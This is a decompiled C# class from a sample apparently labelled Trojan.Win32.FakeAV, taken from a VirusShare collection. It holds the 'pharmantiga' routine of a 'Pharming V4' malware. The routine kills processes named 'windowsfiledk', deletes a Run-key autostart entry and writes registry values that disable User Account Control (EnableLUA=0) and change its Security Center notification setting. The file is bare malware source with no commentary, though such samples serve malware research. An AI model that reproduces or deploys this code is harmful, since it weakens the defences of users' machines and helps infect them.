// Decompiled with JetBrains decompiler
// Type: Pharming_V4.pharmantiga
// Assembly: Pharming V4, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 0A0AA727-6E9B-45EB-9818-CBBF4207AD4A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.FakeAV.msyh-d3f833cca57e8fd32da1564163086307e943e07f01fc02218e28a85509c2cfe2.exe

using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using System;
using System.Diagnostics;

namespace Pharming_V4
{
  [StandardModule]
  internal sealed class pharmantiga
  {
    public static void pharmantiga()
    {
      try
      {
        Process[] processesByName = Process.GetProcessesByName("windowsfiledk");
        int index = 0;
        while (index < processesByName.Length)
        {
          processesByName[index].Kill();
          checked { ++index; }
        }
      }
      catch (Exception ex)
      {
        ProjectData.SetProjectError(ex);
        ProjectData.ClearProjectError();
      }
      try
      {
        Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true).DeleteValue("www.msn.com");
      }
      catch (Exception ex)
      {
        ProjectData.SetProjectError(ex);
        ProjectData.ClearProjectError();
      }
      RegistryKey registryKey1 = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\", true);
      registryKey1.SetValue("EnableLUA", (object) 0);
      registryKey1.Close();
      RegistryKey registryKey2 = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Security Center", true);
      registryKey2.SetValue("UacDisableNotify", (object) 0);
      registryKey2.Close();
    }
  }
}